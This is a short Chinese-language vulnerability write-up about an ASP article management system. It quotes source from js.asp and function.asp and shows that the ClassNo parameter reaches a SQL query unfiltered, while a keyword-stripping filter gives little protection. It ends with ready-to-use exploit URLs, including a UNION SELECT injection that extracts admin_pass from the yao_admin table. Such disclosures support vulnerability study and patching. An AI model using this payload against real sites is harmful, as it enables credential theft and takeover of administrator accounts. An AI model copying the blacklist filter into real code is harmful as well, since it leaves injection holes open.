漏洞出现在js.asp中，我们首先看源代码。

Code:

If CheckStr(Request("ClassNo")) <> "" then
ClassNo = split(CheckStr(Request("ClassNo")),"|")
'这里是获取变量利用checkstr过滤，但是感觉好像没起作用。然后分成数组
on error resume next
NClassID = LaoYRequest(ClassNo(0))
NClassID1 = LaoYRequest(ClassNo(1))
'获取数组1，与数组2进行整形过滤。这里没有漏洞
End if

num = LaoYRequest(request.querystring("num"))'这里num必须>=1
.......
set rs=server.createObject("Adodb.recordset")
sql = "Select top "& num &" ID,Title,TitleFontColor,Author,ClassID,DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0"

        If NclassID<>"" and NclassID1="" then
                If Yao_MyID(NclassID)="0" then
                        SQL=SQL&" and ClassID="&NclassID&""
                else
                        MyID = Replace(""&Yao_MyID(NclassID)&"","|",",")
                        SQL=SQL&" and ClassID in ("&MyID&")"
                End if
        elseif NclassID<>"" and NclassID1<>"" then
                MyID = Replace(""&Request("ClassNo")&"","|",",")
                SQL=SQL&" and ClassID in ("&MyID&")"
                '这里出现的问题classno并没做其他过滤就写入到查询
        End if
        
select case topType
        case "new" sql=sql&" order by DateAndTime desc,ID desc"
        case "hot" sql=sql&" order by hits desc,ID desc"
        case "IsHot" sql=sql&" and IsHot = 1 order by ID desc"
end select

set rs = conn.execute(sql)
if rs.bof and rs.eof then
str=str+"没有符合条件的文章"
........

-------------------------------

function.asp

Code:
function CheckStr(str)
    CheckStr=replace(replace(replace(replace(str,"<","<"),">",">"),chr(13),"")," ","")
        CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","")
    CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(34),"")
        CheckStr=replace(replace(replace(replace(replace(CheckStr,"*",""),"=",""),"or",""),"mid",""),"count","")
end function

利用代码：
js.asp?num=1&ClassNo=1|1|1[SQL]
js.asp?num=1&ClassNo=1|1|1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1 ####获取密码代码